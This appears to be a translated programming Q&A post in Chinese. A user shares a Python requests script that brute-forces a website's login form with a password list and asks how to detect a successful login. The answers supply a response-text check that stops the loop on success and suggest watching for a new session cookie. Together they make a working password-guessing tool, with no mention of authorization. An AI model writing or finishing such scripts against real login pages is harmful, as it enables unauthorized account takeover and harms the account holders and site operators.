我正在使用请求模块执行暴力密码脚本。我如何检查我何时成功登录该网站?
url = sys.argv[1]
user = sys.argv[2]
file = sys.argv[3]
varuser = sys.argv[4]
varpass = sys.argv[5]
passwords = open(file, "r").read().splitlines()
for p in passwords:
payload = {varuser: user, varpass: p}
requests.post(url, data=payload)
答案 0 :(得分:1)
这取决于网站。通常,您可以在响应文本中搜索某些字符串:
...
r = requests.post(url, data=payload)
if 'Welcome' in r.text:
print('SUCCESS!')
break
...
答案 1 :(得分:0)
您可以查看返回的Cookie。登录时可能会有一个(新的?)会话ID。但这取决于网站的工作方式。